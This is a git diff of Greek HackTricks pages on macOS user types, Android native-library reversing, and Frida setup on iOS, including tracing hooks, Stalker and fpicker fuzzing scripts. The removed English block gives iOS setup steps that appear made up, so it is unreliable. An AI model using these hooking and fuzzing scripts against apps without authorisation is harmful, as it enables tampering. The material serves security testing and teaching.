* Για παράδειγμα, ο χρήστης root δεν θα μπορεί να τοποθετήσει ένα αρχείο μέσα στο `/System`
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
* **Κανονικός Χρήστης**: Ο πιο βασικός τύπος χρήστη. Αυτός ο χρήστης χρειάζεται άδεια από έναν διαχειριστή χρήστη όταν προσπαθεί να εγκαταστήσει λογισμικό ή να εκτελέσει άλλες προηγμένες εργασίες. Δεν μπορούν να το κάνουν μόνοι τους.
|
||||
* **Διαχειριστής Χρήστη**: Ένας χρήστης που λειτουργεί τις περισσότερες φορές ως κανονικός χρήστης αλλά του επιτρέπεται επίσης να εκτελέσει ενέργειες root όπως η εγκατάσταση λογισμικού και άλλες διοικητικές εργασίες. Όλοι οι χρήστες που ανήκουν στην ομάδα διαχειριστών **έχουν πρόσβαση στο root μέσω του αρχείου sudoers**.
|
||||
* **Root**: Ο Root είναι ένας χρήστης που επιτρέπεται να εκτελέσει σχεδόν οποιαδήποτε ενέργεια (υπάρχουν περιορισμοί που επιβάλλονται από προστασίες όπως η Προστασία Ακεραιότητας του Συστήματος).
|
||||
* Για παράδειγμα, ο root δεν θα μπορούσε να τοποθετήσει ένα αρχείο μέσα στο `/System`
|
||||
|
|
|
@ -1,50 +1,72 @@
|
|||
# Αντιστροφή Βιβλιοθηκών Φυσικής Κωδικοποίησης
|
||||
# Αντιστροφή Τοπικών Βιβλιοθηκών
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
**Για περαιτέρω πληροφορίες ελέγξτε: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
## WhiteIntel
|
||||
|
||||
Οι εφαρμογές Android μπορούν να χρησιμοποιούν φυσικές βιβλιοθήκες, συνήθως γραμμένες σε C ή C++, για εργασίες που απαιτούν υψηλή απόδοση. Οι δημιουργοί κακόβουλου λογισμικού χρησιμοποιούν επίσης αυτές τις βιβλιοθήκες, καθώς είναι πιο δύσκολο να αντιστραφούν από τον αντίστοιχο κώδικα DEX. Η ενότητα τονίζει τις δεξιότητες αντιστροφής κώδικα που είναι προσαρμοσμένες στο Android, αντί να διδάσκει γλώσσες συναρμολόγησης. Παρέχονται εκδόσεις βιβλιοθηκών ARM και x86 για συμβατότητα.
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
**Για περισσότερες πληροφορίες ελέγξτε: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
|
||||
Οι εφαρμογές Android μπορούν να χρησιμοποιούν τοπικές βιβλιοθήκες, συνήθως γραμμένες σε C ή C++, για εργασίες κρίσιμες για την απόδοση. Οι δημιουργοί κακόβουλου λογισμικού χρησιμοποιούν επίσης αυτές τις βιβλιοθήκες, καθώς είναι πιο δύσκολο να αντιστραφούν από τον κώδικα DEX. Η ενότητα επικεντρώνεται στις δεξιότητες αντιστροφής κώδικα που προσαρμόζονται στο Android, αντί να διδάσκει γλώσσες συναρμολόγησης. Παρέχονται εκδόσεις ARM και x86 των βιβλιοθηκών για συμβατότητα.
|
||||
|
||||
### Κύρια Σημεία:
|
||||
- **Φυσικές Βιβλιοθήκες στις Εφαρμογές Android:**
|
||||
- Χρησιμοποιούνται για εργασίες που απαιτούν υψηλή απόδοση.
|
||||
- Γραμμένες σε C ή C++, καθιστώντας την αντιστροφή κώδικα προκλητική.
|
||||
- Βρίσκονται σε μορφή `.so` (κοινόχρηστο αντικείμενο), παρόμοια με τα δυαδικά αρχεία του Linux.
|
||||
- Οι δημιουργοί κακόβουλου λογισμικού προτιμούν τον φυσικό κώδικα για να δυσκολέψουν την ανάλυση.
|
||||
- **Τοπικές Βιβλιοθήκες στις Εφαρμογές Android:**
|
||||
- Χρησιμοποιούνται για εργασίες με υψηλή απόδοση.
|
||||
- Γραμμένες σε C ή C++, κάνοντας την αντιστροφή δύσκολη.
|
||||
- Βρίσκονται σε μορφή `.so` (κοινόχρηστο αντικείμενο), παρόμοια με τα δυαδικά του Linux.
|
||||
- Οι δημιουργοί κακόβουλου λογισμικού προτιμούν τον τοπικό κώδικα για να δυσκολέψουν την ανάλυση.
|
||||
|
||||
- **Διεπαφή Φυσικού Κώδικα Java (JNI) & Android NDK:**
|
||||
- Το JNI επιτρέπει την υλοποίηση μεθόδων Java σε φυσικό κώδικα.
|
||||
- Το NDK είναι ένα σύνολο εργαλείων που είναι ειδικά σχεδιασμένο για την εγγραφή φυσικού κώδικα στο Android.
|
||||
- Το JNI και το NDK γέφυρωναν τον κώδικα Java (ή Kotlin) με τις φυσικές βιβλιοθήκες.
|
||||
- **Διεπαφή Ενσωμάτωσης Τοπικού Κώδικα (JNI) & Android NDK:**
|
||||
- Η JNI επιτρέπει την υλοποίηση μεθόδων Java σε τοπικό κώδικα.
|
||||
- Το NDK είναι ένα σύνολο εργαλείων ειδικά για το Android για τη συγγραφή τοπικού κώδικα.
|
||||
- Η JNI και το NDK γέφυρωνουν τον κώδικα Java (ή Kotlin) με τις τοπικές βιβλιοθήκες.
|
||||
|
||||
- **Φόρτωση και Εκτέλεση Βιβλιοθηκών:**
|
||||
- Οι βιβλιοθήκες φορτώνονται στη μνήμη χρησιμοποιώντας τις εντολές `System.loadLibrary` ή `System.load`.
|
||||
- Η εντολή JNI_OnLoad εκτελείται κατά τη φόρτωση της βιβλιοθήκης.
|
||||
- Οι φυσικές μέθοδοι που έχουν δηλωθεί στην Java συνδέονται με φυσικές συναρτήσεις, επιτρέποντας την εκτέλεσή τους.
|
||||
- Οι βιβλιοθήκες φορτώνονται στη μνήμη χρησιμοποιώντας τις `System.loadLibrary` ή `System.load`.
|
||||
- Το JNI_OnLoad εκτελείται κατά τη φόρτωση της βιβλιοθήκης.
|
||||
- Οι μεθόδοι του Java που δηλώνονται ως τοπικές συνδέονται με τις τοπικές λειτουργίες, επιτρέποντας την εκτέλεση.
|
||||
|
||||
- **Σύνδεση Μεθόδων Java με Φυσικές Συναρτήσεις:**
|
||||
- **Δυναμική Σύνδεση:** Τα ονόματα των συναρτήσεων στις φυσικές βιβλιοθήκες ακολουθούν ένα συγκεκριμένο πρότυπο, επιτρέποντας την αυτόματη σύνδεση.
|
||||
- **Στατική Σύνδεση:** Χρησιμοποιεί την εντολή `RegisterNatives` για τη σύνδεση, παρέχοντας ευελιξία στην ονοματολογία και τη δομή των συναρτήσεων.
|
||||
- **Σύνδεση Μεθόδων Java με Τοπικές Λειτουργίες:**
|
||||
- **Δυναμική Σύνδεση:** Τα ονόματα λειτουργιών στις τοπικές βιβλιοθήκες ταιριάζουν με ένα συγκεκριμένο πρότυπο, επιτρέποντας την αυτόματη σύνδεση.
|
||||
- **Στατική Σύνδεση:** Χρησιμοποιεί το `RegisterNatives` για τη σύνδεση, παρέχοντας ευελιξία στην ονοματολογία και τη δομή των λειτουργιών.
|
||||
|
||||
- **Εργαλεία και Τεχνικές Αντιστροφής Κώδικα:**
|
||||
- Εργαλεία όπως το Ghidra και το IDA Pro βοηθούν στην ανάλυση των φυσικών βιβλιοθηκών.
|
||||
- Το `JNIEnv` είναι κρίσιμο για την κατανόηση των μεθόδων και των αλληλεπιδράσεων του JNI.
|
||||
- Παρέχονται ασκήσεις για την εξάσκηση στη φόρτωση βιβλιοθηκών, τη σύνδεση μεθόδων και την αναγνώριση φυσικών συναρτήσεων.
|
||||
- Εργαλεία όπως το Ghidra και το IDA Pro βοηθούν στην ανάλυση των τοπικών βιβλιοθηκών.
|
||||
- Το `JNIEnv` είναι κρίσιμο για την κατανόηση των μεθόδων JNI και των αλληλεπιδράσεων.
|
||||
- Παρέχονται ασκήσεις για εξάσκηση στη φόρτωση βιβλιοθηκών, σύνδεση μεθόδων και αναγνώριση τοπικών λειτουργιών.
|
||||
|
||||
### Πόροι:
|
||||
- **Μάθηση Συναρμολόγησης ARM:**
|
||||
- Προτείνεται για μια πιο βαθιά κατανόηση της υποκείμενης αρχιτεκτονικής.
|
||||
- [Βασικές Αρχές Συναρμο
|
||||
- Προτείνεται για μια βαθύτερη κατανόηση της υποκείμενης αρχιτεκτονικής.
|
||||
- [Βασικά της Συναρμολόγησης ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) από το Azeria Labs είναι συνιστώμενα.
|
||||
|
||||
- **Τεκμηρίωση JNI & NDK:**
|
||||
- [Προδιαγραφή JNI της Oracle](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
|
||||
- [Συμβουλές JNI του Android](https://developer.android.com/training/articles/perf-jni)
|
||||
- [Ξεκινώντας με το NDK](https://developer.android.com/ndk/guides/)
|
||||
|
||||
- **Αποσφαλμάτωση Τοπικών Βιβλιοθηκών:**
|
||||
- [Αποσφαλμάτωση Τοπικών Βιβλιοθηκών Android χρησιμοποιώντας το JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
|
|
@ -1,106 +1,61 @@
|
|||
# Ρύθμιση του Frida στο iOS
|
||||
# Ρύθμιση Frida στο iOS
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Εγκατάσταση του Frida
|
||||
|
||||
**Βήματα για να εγκαταστήσετε το Frida σε μια Jailbroken συσκευή:**
|
||||
**Βήματα για την εγκατάσταση του Frida σε μια συσκευή Jailbroken:**
|
||||
|
||||
1. Ανοίξτε την εφαρμογή Cydia/Sileo.
|
||||
2. Πλοηγηθείτε στο Manage -> Sources -> Edit -> Add.
|
||||
3. Εισαγάγετε το "https://build.frida.re" ως URL.
|
||||
4. Πηγαίνετε στην προσθεθείσα πηγή του Frida.
|
||||
2. Πλοηγηθείτε σε Διαχείριση -> Πηγές -> Επεξεργασία -> Προσθήκη.
|
||||
3. Εισαγάγετε "https://build.frida.re" ως URL.
|
||||
4. Μεταβείτε στη νεοπροσταθείσα πηγή του Frida.
|
||||
5. Εγκαταστήστε το πακέτο του Frida.
|
||||
|
||||
Εάν χρησιμοποιείτε το **Corellium**, θα πρέπει να κατεβάσετε την έκδοση του Frida από [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) και να αποσυμπιέσετε και να αντιγράψετε στην τοποθεσία dylib που ζητά ο Frida, π.χ.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
Αν χρησιμοποιείτε το **Corellium** θα πρέπει να κατεβάσετε την έκδοση του Frida από [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) και να αποσυμπιέσετε και να αντιγράψετε στη θέση dylib που ζητάει ο Frida, π.χ.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
|
||||
Αφού εγκατασταθεί, μπορείτε να χρησιμοποιήσετε στον υπολογιστή σας την εντολή **`frida-ls-devices`** και να ελέγξετε ότι η συσκευή εμφανίζεται (ο υπολογιστής σας πρέπει να μπορεί να την προσπελάσει).\
|
||||
Μετά την εγκατάσταση, μπορείτε να χρησιμοποιήσετε στον υπολογιστή σας την εντολή **`frida-ls-devices`** και να ελέγξετε ότι η συσκευή εμφανίζεται (ο υπολογιστής σας πρέπει να μπορεί να την προσπελάσει).\
|
||||
Εκτελέστε επίσης την εντολή **`frida-ps -Uia`** για να ελέγξετε τις εκτελούμενες διεργασίες του τηλεφώνου.
|
||||
|
||||
## Χρήση του Frida χωρίς Jailbroken συσκευή και χωρίς επιδιόρθωση της εφαρμογής
|
||||
## Εγκατάσταση του Πελάτη Frida
|
||||
|
||||
Ελέγξτε αυτήν την ανάρτηση στο blog για το πώς να χρησιμοποιήσετε το Frida σε μη-Jailbroken συσκευές χωρίς επιδιόρθωση της εφαρμογής: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
|
||||
|
||||
## Εγκατάσταση του Frida Client
|
||||
|
||||
Εγκαταστήστε τα **εργαλεία του frida**:
|
||||
Εγκαταστήστε τα **εργαλεία frida**:
|
||||
```bash
|
||||
pip install frida-tools
|
||||
pip install frida
|
||||
```
|
||||
Με τον Frida server εγκατεστημένο και τη συσκευή να εκτελείται και να είναι συνδεδεμένη, **ελέγξτε** αν ο πελάτης **λειτουργεί**:
|
||||
Με τον διακομιστή Frida εγκατεστημένο και τη συσκευή ενεργή και συνδεδεμένη, **ελέγξτε** αν ο πελάτης **λειτουργεί**:
|
||||
```bash
|
||||
frida-ls-devices # List devices
|
||||
frida-ps -Uia # Get running processes
|
||||
```
|
||||
## Καταγραφή με το Frida
|
||||
|
||||
Frida is a dynamic instrumentation framework that allows you to inject JavaScript code into running processes. It is commonly used for mobile application security testing and analysis. With Frida, you can trace function calls, monitor network traffic, modify function behavior, and much more.
|
||||
|
||||
To configure Frida for iOS pentesting, follow these steps:
|
||||
|
||||
1. Install Frida on your iOS device by using the following command:
|
||||
|
||||
```
|
||||
pip install frida-tools
|
||||
```
|
||||
|
||||
2. Connect your iOS device to your computer using a USB cable.
|
||||
|
||||
3. Enable USB debugging on your iOS device by going to **Settings > Developer > Enable USB Debugging**.
|
||||
|
||||
4. Launch the Frida server on your iOS device by running the following command:
|
||||
|
||||
```
|
||||
frida-server -l 0.0.0.0:1234
|
||||
```
|
||||
|
||||
5. Verify that the Frida server is running by checking the output for the following line:
|
||||
|
||||
```
|
||||
Listening on 0.0.0.0:1234...
|
||||
```
|
||||
|
||||
6. Install the Frida client on your computer by running the following command:
|
||||
|
||||
```
|
||||
npm install frida
|
||||
```
|
||||
|
||||
7. Create a new JavaScript file with your desired Frida trace code. For example, you can use the following code to trace the `open` function:
|
||||
|
||||
```javascript
|
||||
const open = Module.findExportByName(null, 'open');
|
||||
Interceptor.attach(open, {
|
||||
onEnter: function(args) {
|
||||
console.log('open called with path: ' + Memory.readUtf8String(args[0]));
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
8. Run the Frida client with the following command, replacing `your_script.js` with the path to your JavaScript file:
|
||||
|
||||
```
|
||||
frida -U -l your_script.js
|
||||
```
|
||||
|
||||
9. Launch the target application on your iOS device.
|
||||
|
||||
10. You should see the output of your Frida trace code in the terminal, displaying the function calls or other information you specified.
|
||||
|
||||
By following these steps, you can configure Frida for iOS pentesting and use it to trace and analyze the behavior of iOS applications.
|
||||
## Καταγραφή Frida
|
||||
```bash
|
||||
# Functions
|
||||
## Trace all functions with the word "log" in their name
|
||||
|
@ -122,9 +77,9 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
|
|||
|
||||
* Αυτόματη συμπλήρωση: Απλά εκτελέστε `frida -U <πρόγραμμα>`
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (687).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Λήψη **όλων** των διαθέσιμων **κλάσεων** (φιλτράρισμα με βάση το string)
|
||||
* Λήψη **όλων** των διαθέσιμων **κλάσεων** (φιλτράρισμα με βάση τη συμβολοσειρά)
|
||||
|
||||
{% code title="/tmp/script.js" %}
|
||||
```javascript
|
||||
|
@ -146,7 +101,7 @@ console.log("Objective-C runtime is not available.");
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* Πάρτε **όλες** τις **μεθόδους** ενός **κλάσης** (φιλτράρετε με βάση το string)
|
||||
* Λήψη **όλων** των **μεθόδων** ενός **κλάσης** (φιλτράρισμα με βάση τη συμβολοσειρά)
|
||||
|
||||
{% code title="/tmp/script.js" %}
|
||||
```javascript
|
||||
|
@ -208,11 +163,11 @@ console.log("loaded");
|
|||
|
||||
### Frida Stalker
|
||||
|
||||
[Από τα έγγραφα](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Ο Stalker είναι ο μηχανισμός **ανίχνευσης κώδικα** του Frida. Επιτρέπει την **παρακολούθηση** νημάτων, **καταγράφοντας** κάθε συνάρτηση, **κάθε μπλοκ**, ακόμα και κάθε εντολή που εκτελείται.
|
||||
[Από τα έγγραφα](https://frida.re/docs/stalker/): Ο Stalker είναι η μηχανή **ανίχνευσης** κώδικα του Frida. Επιτρέπει την παρακολούθηση νημάτων, **καταγράφοντας** κάθε συνάρτηση, **κάθε μπλοκ**, ακόμα και κάθε εντολή που εκτελείται.
|
||||
|
||||
Έχετε ένα παράδειγμα υλοποίησης του Frida Stalker στο [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
|
||||
|
||||
Αυτό είναι ένα άλλο παράδειγμα για να συνδεθείτε με το Frida Stalker κάθε φορά που καλείται μια συνάρτηση:
|
||||
Αυτό είναι ένα άλλο παράδειγμα για να συνδέσετε το Frida Stalker κάθε φορά που καλείται μια συνάρτηση:
|
||||
```javascript
|
||||
console.log("loading");
|
||||
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
|
||||
|
@ -246,14 +201,14 @@ Stalker.flush(); // this is important to get all events
|
|||
});
|
||||
```
|
||||
{% hint style="danger" %}
|
||||
Αυτό είναι ενδιαφέρον για σκοπούς αποσφαλμάτωσης, αλλά για το fuzzing, να ακολουθείται συνεχώς το **`.follow()`** και το **`.unfollow()`** είναι πολύ ανεπαρκές.
|
||||
Αυτό είναι ενδιαφέρον για λόγους εντοπισμού σφαλμάτων, αλλά για το fuzzing, το συνεχές **`.follow()`** και **`.unfollow()`** είναι πολύ ανεπαρκές.
|
||||
{% endhint %}
|
||||
|
||||
## [Fpicker](https://github.com/ttdennis/fpicker)
|
||||
|
||||
Το [**fpicker**](https://github.com/ttdennis/fpicker) είναι ένα σύνολο εργαλείων για fuzzing βασισμένο στο Frida που προσφέρει διάφορα modes για το in-process fuzzing, όπως ένα mode AFL++ ή ένα mode παθητικής παρακολούθησης. Θα πρέπει να λειτουργεί σε όλες τις πλατφόρμες που υποστηρίζονται από το Frida.
|
||||
[**fpicker**](https://github.com/ttdennis/fpicker) είναι ένα **Frida-based εργαλείο fuzzing** που προσφέρει μια ποικιλία λειτουργιών fuzzing για in-process fuzzing, όπως έναν τρόπο AFL++ ή έναν παθητικό τρόπο ανίχνευσης. Θα πρέπει να λειτουργεί σε όλες τις πλατφόρμες που υποστηρίζονται από το Frida.
|
||||
|
||||
* [**Εγκατάσταση του fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
|
||||
* [**Εγκατάσταση fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
|
||||
```bash
|
||||
# Get fpicker
|
||||
git clone https://github.com/ttdennis/fpicker
|
||||
|
@ -272,7 +227,7 @@ make fpicker-[yourOS] # fpicker-macos
|
|||
# Install radamsa (fuzzer generator)
|
||||
brew install radamsa
|
||||
```
|
||||
* **Προετοιμασία του αρχείου συστήματος:**
|
||||
* **Προετοιμασία του συστήματος αρχείων (FS):**
|
||||
```bash
|
||||
# From inside fpicker clone
|
||||
mkdir -p examples/wg-log # Where the fuzzing script will be
|
||||
|
@ -282,7 +237,7 @@ mkdir -p examples/wg-log/in # For starting inputs
|
|||
# Create at least 1 input for the fuzzer
|
||||
echo Hello World > examples/wg-log/in/0
|
||||
```
|
||||
* **Σενάριο Fuzzer** (`παραδείγματα/wg-log/myfuzzer.js`):
|
||||
* **Fuzzer script** (`παραδείγματα/wg-log/myfuzzer.js`):
|
||||
|
||||
{% code title="παραδείγματα/wg-log/myfuzzer.js" %}
|
||||
```javascript
|
||||
|
@ -364,18 +319,18 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Σε αυτήν την περίπτωση **δεν επανεκκινούμε την εφαρμογή ή επαναφέρουμε την κατάσταση** μετά από κάθε φορτίο. Έτσι, αν ο Frida βρει ένα **σφάλμα** τα **επόμενα εισαγωγικά** μετά από αυτό το φορτίο μπορεί επίσης να **καταρρεύσουν την εφαρμογή** (επειδή η εφαρμογή βρίσκεται σε μια ασταθή κατάσταση), ακόμη κι αν η **είσοδος δεν θα έπρεπε να καταρρεύσει** την εφαρμογή.
|
||||
Σε αυτήν την περίπτωση **δεν επανεκκινούμε την εφαρμογή ή επαναφέρουμε την κατάσταση** μετά από κάθε φορτωτή. Έτσι, αν το Frida βρει ένα **σφάλμα** τα **επόμενα δεδομένα εισόδου** μετά από αυτόν τον φορτωτή ενδέχεται επίσης να **καταρρεύσουν την εφαρμογή** (επειδή η εφαρμογή βρίσκεται σε μη σταθερή κατάσταση), ακόμη κι αν η **είσοδος δεν θα έπρεπε να καταρρεύσει** την εφαρμογή.
|
||||
|
||||
Επιπλέον, ο Frida θα συνδεθεί με τα σήματα εξαιρέσεων του iOS, οπότε όταν ο **Frida βρει ένα σφάλμα**, πιθανώς δεν θα δημιουργηθούν **αναφορές σφάλματος του iOS**.
|
||||
Επιπλέον, το Frida θα συνδεθεί με τα σήματα εξαιρέσεων του iOS, οπότε όταν το **Frida βρει ένα σφάλμα**, πιθανώς δεν θα δημιουργηθούν **αναφορές κατάρρευσης του iOS**.
|
||||
|
||||
Για να αποτρέψετε αυτό, για παράδειγμα, θα μπορούσαμε να επανεκκινήσουμε την εφαρμογή μετά από κάθε κατάρρευση του Frida.
|
||||
Για να αποτρέψουμε αυτό, για παράδειγμα, θα μπορούσαμε να επανεκκινήσουμε την εφαρμογή μετά από κάθε κατάρρευση του Frida.
|
||||
{% endhint %}
|
||||
|
||||
### Αρχεία καταγραφής και καταρρίψεις
|
||||
### Καταγραφές & Καταρρεύσεις
|
||||
|
||||
